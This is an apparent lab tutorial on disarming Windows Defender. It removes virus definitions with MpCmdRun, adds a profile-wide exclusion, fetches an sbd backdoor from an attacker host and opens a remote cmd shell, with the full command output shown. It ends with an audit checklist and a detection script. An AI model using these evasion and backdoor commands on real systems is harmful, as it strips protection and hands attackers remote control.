Disarm Windows Defender

When we try to download a backdoor program, Windows Defender blocks the file:

Invoke-WebRequest -uri "http://192.168.1.17/sbd.exe" -OutFile ".\sbd.exe"

[screenshot: malware detected]

The threats Windows Defender has detected can be listed with the Defender PowerShell module:

Get-MpThreat
 
 
CategoryID       : 8
DidThreatExecute : True
IsActive         : False
Resources        : {file:_C:\Users\Mambo Yoyo\clone.exe, file:_C:\Users\Mambo Yoyo\sbd.exe,
                   process:_pid:6560,ProcessStart:130877310747205268,
                   process:_pid:6752,ProcessStart:130876708785643534}
RollupStatus     : 97
SchemaVersion    : 1.0.0.0
SeverityID       : 4
ThreatID         : 2147626070
ThreatName       : Trojan:Win32/Trafog!rts
TypeID           : 0
PSComputerName   :

Most antivirus software runs as a protected service, so we can't stop or disable it from the command line:

net stop windefend
System error 5 has occurred.
 
Access is denied.
sc stop windefend
[SC] OpenService FAILED 5:
 
Access is denied.

Even when we run this as SYSTEM (via PsExec) we still get an access denied:

 .\psexec.exe -s cmd
 
PsExec v2.11 - Execute processes remotely
Copyright (C) 2001-2014 Mark Russinovich
Sysinternals - www.sysinternals.com
 
 
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32>whoami
nt authority\system
 
C:\Windows\system32>net stop windefend
System error 5 has occurred.
 
Access is denied.

In the GUI these functions are not available either.

[screenshot: Defender service]

One way to get our backdoor onto the system is to remove all virus definitions with the MpCmdRun command-line utility:

PS C:\Program Files\Windows Defender> .\MpCmdRun.exe -removedefinitions -all
 
Service Version: 4.8.207.0
Engine Version: 1.1.12101.0
AntiSpyware Signature Version: 1.207.1041.0
AntiVirus Signature Version: 1.207.1041.0
NIS Engine Version: 2.1.11804.0
NIS Signature Version: 115.22.0.0
 
Starting engine and signature rollback to none...
Done!

Now that we have removed all definitions, we can download our backdoor program:

Invoke-WebRequest -uri "http://192.168.1.17/sbd.exe" -OutFile ".\sbd.exe"
PS C:\Users\Mambo Yoyo> dir .\sbd.exe
 
 
    Directory: C:\Users\Mambo Yoyo
 
 
Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         9/26/2015  10:44 AM      50176 sbd.exe

And we can also execute our backdoor (sbd listening on port 444, spawning cmd):

.\sbd.exe -l -p 444 -r 5 -e cmd -c on

And connect to it from the attacking machine:

root@kali:/var/www# sbd 192.168.1.8 444 -c on
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
 
C:\Users\Mambo Yoyo>ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Bluetooth Network Connection:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::d876:531d:e07c:f20%3
   IPv4 Address. . . . . . . . . . . : 192.168.1.8
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.1.1

As soon as the Windows Defender signatures are updated again, our backdoor is detected and removed:

C:\Program Files\Windows Defender> .\MpCmdRun.exe -signatureupdate
Signature update started . . .
Signature update finished.

Instead of removing the definitions we can also add an exclusion path, which makes Defender skip that directory:

C:\users\Mambo Yoyo> Set-MpPreference -ExclusionPath "C:\Users\Mambo Yoyo"

From a defence/audit perspective we have to verify that:

  • Antivirus/anti-malware software is installed
  • Antivirus/anti-malware software is running
  • Antivirus/anti-malware software is up-to-date
  • Antivirus/anti-malware exclusions/exceptions are reviewed
  • Antivirus/anti-malware events are sent to a central log point
  • Antivirus/anti-malware events are monitored and analysed, and action is taken on them
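The following audit script is an added example (not from the original post) that checks the six points above on a local host with the Defender PowerShell module. The 7-day signature age threshold and the 24-hour event window are assumptions; the Defender operational-log event IDs used are the standard ones (5007 configuration changed, 5001 real-time protection disabled, 2001 signature update failed, 1116 malware detected).

```powershell
# Added audit script (not part of the original post). Thresholds are assumptions.
$findings = @()

# 1-2. Installed and running: the Defender module is absent when Defender is not installed.
if (-not (Get-Command Get-MpComputerStatus -ErrorAction SilentlyContinue)) {
    Write-Output "FAIL: Defender PowerShell module not found (Defender not installed?)"
    return
}
$status = Get-MpComputerStatus
if (-not $status.AMServiceEnabled)          { $findings += "AM service not running" }
if (-not $status.RealTimeProtectionEnabled) { $findings += "Real-time protection disabled" }

# 3. Up to date: signature age in days as reported by the platform. After
#    'MpCmdRun -removedefinitions -all' or a long-blocked update this grows quickly.
$maxAgeDays = 7   # assumption: adjust to your policy
if ($status.AntivirusSignatureAge -gt $maxAgeDays) {
    $findings += "AV signatures are $($status.AntivirusSignatureAge) days old (version $($status.AntivirusSignatureVersion))"
}

# 4. Exclusions: a path exclusion such as a whole user profile hides everything in it from scans.
$pref = Get-MpPreference
foreach ($p in @($pref.ExclusionPath))      { if ($p) { $findings += "Path exclusion: $p" } }
foreach ($e in @($pref.ExclusionExtension)) { if ($e) { $findings += "Extension exclusion: $e" } }
foreach ($x in @($pref.ExclusionProcess))   { if ($x) { $findings += "Process exclusion: $x" } }
if ($pref.DisableRealtimeMonitoring)        { $findings += "DisableRealtimeMonitoring is set" }

# 5-6. Events that should be forwarded centrally and alerted on. Set-MpPreference
#      changes (e.g. a new ExclusionPath) show up as event 5007 in this log.
$filter = @{
    LogName   = 'Microsoft-Windows-Windows Defender/Operational'
    Id        = 1116, 2001, 5001, 5007
    StartTime = (Get-Date).AddHours(-24)   # assumption: 24h lookback
}
$events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue
foreach ($ev in $events) {
    $firstLine = ($ev.Message -split "`n")[0]
    $findings += "Event $($ev.Id) at $($ev.TimeCreated): $firstLine"
}

if ($findings.Count -eq 0) {
    Write-Output "OK: no Defender audit findings"
} else {
    $findings | ForEach-Object { Write-Output "FINDING: $_" }
}
```

Run it in an elevated PowerShell session; on a host where the steps above were carried out it reports the stale signatures, the profile-wide exclusion and the corresponding 5007 event.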